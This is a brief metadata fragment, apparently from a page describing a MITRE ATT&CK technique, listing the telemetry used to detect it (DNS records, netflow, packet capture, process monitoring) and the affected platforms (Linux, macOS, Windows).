Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre